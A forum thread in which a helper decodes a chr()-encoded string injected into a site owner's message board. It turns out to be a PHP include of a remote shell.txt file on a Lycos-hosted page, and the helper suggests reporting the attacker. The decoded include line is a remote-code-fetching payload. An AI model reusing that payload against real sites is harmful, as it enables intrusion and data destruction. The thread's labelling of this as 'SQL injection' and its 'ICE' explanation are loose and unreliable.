Thanks The_Fire, interesting! Can you translate the full thing? I want to see where this goes. I'll take out the beginning and end:
eta: we've been deleting it as it comes in, should we edit the string before deleting?
No, it should be ok to delete as it comes in. The trick with SQL injection/database high-jacking is to "piggyback" your database connection with a foreign script or by inserting a command directly in the forms of your board. This means that your server will execute the piggybacked signal on "Send" if at all possible, but the code gibberish in your case means that the script have failed to execute due to your forum software having a sufficient level of ICE (Intrusion Counter mEasure) installed to prevent this. It's not pretty to look at though
.
The string replace I suggested is also an ICE as it takes what would be a part of an include statement and basically turns it into non-parsable gibberish which your server wont recognize as a command.
It will still store/print it, but it won't execute the include command and thus wont execute the foreign script.
Here's your translation:
chr(105) i
chr(110) n
chr(99) c
chr(108) l
chr(117) u
chr(100) d
chr(101) e
chr(32) <space>
chr(34) "
chr(104) h
chr(116) t
chr(116) t
chr(112) p
chr(58) :
chr(47) /
chr(47) /
chr(109) m
chr(101) e
chr(109) m
chr(98) b
chr(101) e
chr(114) r
chr(115) s
chr(46) .
chr(108) l
chr(121) y
chr(99) c
chr(111) o
chr(115) s
chr(46) .
chr(99) c
chr(111) o
chr(46) .
chr(117) u
chr(107) k
chr(47) /
chr(109) m
chr(97) a
chr(104) h
chr(114) r
chr(111) o
chr(109) m
chr(47) /
chr(115) s
chr(104) h
chr(101) e
chr(108) l
chr(108) l
chr(46) .
chr(116) t
chr(120) x
chr(116) t
chr(34) "
chr(59) ;
chr(47) /
chr(42) *
chr(32) <space>
Which pretty much shows that the person on the other end is a ****ing programming moron.
In a more readable format, the file he's trying to execute is:
Not only have the idiot given the inlude file the wrong file designation (that would be the txt part) for it to run on HIS server, he's also using the free server from British Lycos.
His username on lycos is mahrom, btw, as this is his subdomain. If you contact Lycos (
http://lycos.co.uk) you can shut him down on that end.
With a brief look at the contents/codes of that file, he's trying to;
A; Copy your userdata
B: Delete your uesrdata
C: Delete your website data
D: Make it look like your website is malfunctioning
E: Possible hack your website by changing the contents of your database....
A definite choice for the WWW Darwin awards. Instead of simply reporting him to Lycos, I would contemplate turning the arsehole over to the authorities. Hacking is illegal in most civilised socities.
geez....That root directory looks like an amateur hackers playground.....Definite contemplate that "Feds breathing down your neck, scumbag" scenario.....
I would also hazzard the guess that he's somehow managed to set up a bot to auto submit the include command to your board.
The interesting thing is that the scripts looks to be of russian origins, but on a british server?
And this, of cause, brings up the interesting question: Whom did you piss off?
